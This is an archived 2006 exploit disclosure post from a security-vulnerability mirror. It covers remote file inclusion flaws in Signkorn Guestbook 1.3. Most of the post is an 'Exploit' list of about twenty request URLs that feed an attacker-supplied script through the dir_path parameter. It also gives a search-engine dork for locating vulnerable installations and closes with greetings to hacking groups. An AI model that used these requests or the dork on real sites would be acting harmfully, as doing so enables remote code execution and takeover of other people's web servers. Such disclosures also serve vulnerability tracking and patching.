Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  easypage.org >> v7 sql injection

  Limbo - Lite Mambo CMS Multiple Vulnerabilities

  Roller Weblogger XSS vulnerability

  BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability

From:HACKERS PAL <security_(at)_soqor.net>
Date:18.09.2006
Subject:Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities

# Signkorn Guestbook <= v1.3 Multiple Remote File Include Vulnerabilities

# Discovred By     : ThE__LeO ;

# Software         : Signkorn Guestbook v 1.3 ;

# Dork             : "Signkorn Guestbook 1.3" & "Signkorn Guestbook 1.1 " Signkorn Guestbook 1.2"

# Exploit          : http://Www.Example.Com/[Script]/index.php?dir_path=[U r Evil Script] ;
                    http://Www.Example.Com/[Script]/includes/functions.gb.
php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/includes/
functions.admin.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/includes/
admin.inc.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help.
php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/smile.
php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help/en/a
dminhelp0.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help/en/a
dminhelp1.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help/en/a
dminhelp2.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help/en/a
dminhelp3.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help/de/a
dminhelp0.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help/de/a
dminhelp1.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help/de/a
dminhelp2.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/help/de/a
dminhelp3.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/entry.
php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/admin/pre
view.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/admin/log
.php?dir_path=[U r Evil Script] ;
                    http://Www.Example.Com/[Script]/admin/index.php?dir_path=[U r Evil Script] ;
                                        http://Www.Example.Com/[Script]/admin/con
fig.php?dir_path=[U r Evil Script] ;
                    http://Www.Example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;

# Greetz           : M.I.D.T[DrackanZ, Mr.IlysS, NeThug47],Arabian-FighterZ, lhma9, Death & All Moroccan & Arab Hackers ;     

# Safi Braka yallah Tla7 ;)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server